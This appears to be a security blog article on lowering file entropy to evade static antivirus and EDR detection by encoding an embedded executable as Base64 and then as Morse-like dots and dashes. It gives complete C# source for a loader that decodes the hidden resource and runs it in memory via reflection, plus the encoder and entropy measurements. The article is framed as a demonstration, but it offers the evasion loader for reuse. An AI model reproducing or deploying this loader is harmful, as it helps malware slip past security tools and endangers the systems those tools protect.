Introduction
This article demonstrates reducing the Entropy score with a goal of evading the static detection by encoding characters using only dashes and dots. Inspired by the Morse Code!
Primary Keywords: Binary Entropy analysis | Evading Static Analysis | Morse Code Encoder
What is Morse Code?
Morse Code is a communications “language” that was initially developed for transmission of letter by letter textual information by wire using the telegraph system. The code has also found wireless applications using signal lamps and audio devices and has also been used in long range radio communications and radio navigation applications [1].
The Morse Code
Samuel Morse developed the initial facets of the code which bares his name but others contributed to the code as it now exists. The International Morse Code encodes each letter of the basic Latin alphabet, each of the Arabic numerals and a small set of punctuation and procedural signals (prosigns) as a sequence of short and long electrical pulses referred to as “dots” (short) and “dashes” (long) or “dits” and “dahs” [1]. The code is depicted in the following table [2]:
Letters –
A | .- | N | -. |
B | -… | O | — |
C | -.-. | P | .–. |
D | -.. | Q | –.- |
E | . | R | .-. |
F | ..-. | S | … |
G | –. | T | – |
H | …. | U | ..- |
I | .. | V | …- |
J | .— | W | .– |
K | _._ | X | -..- |
L | .-.. | Y | -.– |
M | — | Z | –.. |
Numbers –
1 | .—- | 6 | -…. |
2 | ..— | 7 | –… |
3 | …– | 8 | —.. |
4 | ….- | 9 | —-. |
5 | ….. | 0 | —– |
Punctuation –
& Ampersand | .-… | ‘ Apostrophe | .—-. |
@ At sign | .–.-. | ) Bracket, close (parenthesis) | -.–.- |
: Colon | —… | ( Bracket, open (parenthesis) | -.–. |
, Comma | –..– | = Equals sign | -…- |
! Exclamation mark | -.-.– | . Full-stop (period) | .-.-.- |
– Hyphen | -….- | × Multiplication sign (also x) | -..- |
% Percentage (literally 0/0) | —– -..-. —– | + Plus sign | .-.-. |
” Quotation marks | .-..-. | ? Question mark (query) | ..–.. |
/ Slash | -..-. |
Entropy analysis
Entropy is a measure of randomness within a set of data. When referenced in the context of information theory and cybersecurity, most people are referring to Shannon Entropy. This is a specific algorithm that returns a value between 0 and 8 were values near 8 indicate that the data is very random, while values near 0 indicate that the data is very homologous [3].
How does Entropy analysis apply to intrusion detection?
Shannon entropy can be a good indicator for detecting the use of packing, compression, and encryption in a file. Each of the previously mentioned techniques tends to increase the overall entropy of a file. This makes sense intuitively. Let’s take compression for example. Compression algorithms reduce the size of certain types of data by replacing duplicated parts with references to a single instance of that part. The end result is a file with less duplicated contents. The less duplication there is in a file, the higher the entropy will be because the data is less predictable than it was before [3].
As it turns out, malware authors also tend to rely heavily on packing, compression, and encryption to obfuscate their tools on order to evade signature based detection systems [3].
Reducing Entropy level using Morse Code
The primary goal here is to reduce the entropy level. The scenario described in this article is that we have a .NET PE that loads and executes an embedded PE that has been encoded using Base64 and Morse code.
In the code snippet below, we can see that the program is loading a Morse code from an embedded resource, then decodes it and executes it in memory.
- Read the content of the embedded file “mc”
- Decode the content of the file from Morse code to Base64
- Load and Invoke the assembly bytes in memory
Morse Code sample snippet:
-~...-~..-..-~--.-~.-~.-~--~.-[...snip...]~.-~.-~-..-.~-..-.~---..~.-
Calculating the Entropy Score
We can calculate the Entropy score using the sigcheck.exe utility that comes with the Microsoft Sysinternals Suite: > sigcheck.exe -h -a FILE_PATH
Here are the results for two different PE samples, one with an embedded PE resource encoded as a Morse Code and another sample embedded and encoded as a base64. We can see that the sample that used Base64 has a 5.781 Entropy score, and the one that used Morse code has a 2.572.
–
Our Entropy analysis aligns with the results described in Figure 2!
The Morse Code Encoder
The following is the complete code for our test program, including the Encoding & Decoding functions. This is just a simple demonstration on how to encode characters using the dots and dashes. You might think of your own encoding dictionary!
using System;
using System.Collections.Concurrent;
using System.Collections.Generic;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
namespace ConsoleApp2
{
internal class Program
{
private static void Main()
{
string res = Properties.Resources.mc;
// Debug
File.WriteAllText("mc.txt", res);
var b64 = MorseEncoder.Decode(res).Result;
var pBytes = Convert.FromBase64String(b64);
// Debug
File.WriteAllBytes("prog.exe", pBytes);
if (pBytes.Length < 10)
return;
var thread = new Thread(() =>
{
var assembly = Assembly.Load(pBytes);
MethodInfo method = assembly.EntryPoint;
if (method != null)
{
method.Invoke(null, null);
}
});
thread.SetApartmentState(ApartmentState.STA);
thread.Start();
}
}
internal static class MorseEncoder
{
private static readonly Dictionary<char, string> MorseCodeDict = new Dictionary<char, string>
{
{'A', ".-"},
{'B', "-..."},
{'C', "-.-."},
{'D', "-.."},
{'E', "."},
{'F', "..-."},
{'G', "--."},
{'H', "...."},
{'I', ".."},
{'J', ".---"},
{'K', "-.-"},
{'L', ".-.."},
{'M', "--"},
{'N', "-."},
{'O', "---"},
{'P', ".--."},
{'Q', "--.-"},
{'R', ".-."},
{'S', "..."},
{'T', "-"},
{'U', "..-"},
{'V', "...-"},
{'W', ".--"},
{'X', "-..-"},
{'Y', "-.--"},
{'Z', "--.."},
{'a', "-..---"},
{'b', "----.-"},
{'c', "-.----"},
{'d', "-----."},
{'e', ".----."},
{'f', "--.---"},
{'g', ".-..--"},
{'h', "..-.--"},
{'i', "-..--."},
{'j', "--.-.."},
{'k', "-.-..-"},
{'l', "..-.-."},
{'m', "-...--"},
{'n', "-....."},
{'o', "..----"},
{'p', "-.---."},
{'q', "..-..-"},
{'r', ".--..-"},
{'s', ".-...-"},
{'t', "-..-.."},
{'u', "----.."},
{'v', ".-...."},
{'w', ".-.--."},
{'x', ".-.-.."},
{'y', "---.-."},
{'z', "...---"},
{'0', "-----"},
{'1', ".----"},
{'2', "..---"},
{'3', "...--"},
{'4', "....-"},
{'5', "....."},
{'6', "-...."},
{'7', "--..."},
{'8', "---.."},
{'9', "----."},
{',', "--..--"},
{'?', "..--.."},
{'\'', "..---."},
{'!', "-.-.--"},
{'/', "-..-."},
{'(', "-.--."},
{')', "-.--.-"},
{'&', ".-..."},
{':', "---..."},
{';', "-.-.-."},
{'=', "-...-"},
{'-', "-....-"},
{'_', "..--.-"},
{'"', ".-..-."},
{'$', "...-..-"},
{'@', ".--.-."},
{'.', ".-.-.-"},
{'+', "...-.-"},
{'[', "..-..."},
{']', "---..-"},
{'%', ".-.---"},
{' ', "/"},
};
private static async Task<string> ReadFileAsStringAsync(string path)
{
using (StreamReader reader = new StreamReader(path, Encoding.UTF8))
{
return await reader.ReadToEndAsync();
}
}
public static async Task<string> EncodeFile(string filePath, bool doBase64PreEncoding)
{
string morseCode;
if (doBase64PreEncoding)
{
var base64 = await EncodeFileToStringAsync(filePath);
morseCode = await Encode(base64);
}
else
{
var input = await ReadFileAsStringAsync(filePath);
morseCode = await Encode(input);
}
return morseCode;
}
public static async Task<string> Encode(string message)
{
var sb = new StringBuilder();
// Divide the input into smaller chunks and process them in parallel
var chunkSize = 1000;
var numChunks = (message.Length + chunkSize - 1) / chunkSize;
await Task.Run(() =>
{
var results = new ConcurrentDictionary<int, string>();
Parallel.For(0, numChunks, chunkIndex =>
{
var chunkStringBuilder = new StringBuilder();
var start = chunkIndex * chunkSize;
var end = Math.Min(message.Length, start + chunkSize);
for (var i = start; i < end; i++)
{
var c = message[i];
if (MorseCodeDict.TryGetValue(c, out string morse))
{
chunkStringBuilder.Append(morse);
chunkStringBuilder.Append('~');
}
else if (c == ' ')
{
chunkStringBuilder.Append('/');
}
}
results.TryAdd(chunkIndex, chunkStringBuilder.ToString());
});
// Combine the results back into a single string
foreach (var kvp in results.OrderBy(kvp => kvp.Key))
{
sb.Append(kvp.Value);
}
});
var r = sb.ToString().Trim();
r = r.EndsWith("/") ? sb.ToString().TrimEnd('/') : r;
r = r.EndsWith("~") ? sb.ToString().TrimEnd('~') : r;
return r;
}
public static async Task<string> Decode(string morseCode)
{
return await Task.Run(() =>
{
var decodedMessage = new StringBuilder();
var morseWords = morseCode.Split(new[] { " / " }, StringSplitOptions.None);
foreach (var morseWord in morseWords)
{
var morseChars = morseWord.Split('~');
foreach (var morseChar in morseChars)
{
var character = MorseCodeDict.FirstOrDefault(x => x.Value == morseChar).Key;
if (character != default)
{
decodedMessage.Append(character);
}
}
decodedMessage.Append(' ');
}
return decodedMessage.ToString().TrimEnd();
});
}
public static byte[] DecodeToBytes(string base64String)
{
return Convert.FromBase64String(base64String);
}
public static async Task<string> EncodeFileToStringAsync(string filePath)
{
byte[] fileBytes = await ReadFileAsync(filePath);
return Convert.ToBase64String(fileBytes);
}
private static async Task<byte[]> ReadFileAsync(string path)
{
using (FileStream fs = new FileStream(path, FileMode.Open, FileAccess.Read))
{
byte[] buffer = new byte[fs.Length];
await fs.ReadAsync(buffer, 0, buffer.Length);
return buffer;
}
}
}
}
Summary
- The Entropy score is used as a factor by malware analysts and AV/EDRs to identify malwares, packed and encrypted samples.
- A higher entropy score indicates a greater likelihood that the sample is packed, encrypted, or obfuscated.
- The article has demonstrated two Entropy analysis results for two PE Samples. The PE encoded with Base64 scored 5.781, and the Morse Encoded sample scored 2.572.
- Malware authors tend to rely heavily on packing, compression, and encryption to obfuscate their tools on order to evade signature based detection systems
Interesting reads
Threat Actors Used Morse Code to Avoid Detection – Microsoft Researchers Revealed on That Threat Actors Have Turned to Morse Code in a Year-Long Phishing Campaign.
References
[1] Morse Code
[3] Threat Hunting with File Entropy
[4] Using Entropy Analysis to Find Encrypted and Packed Malware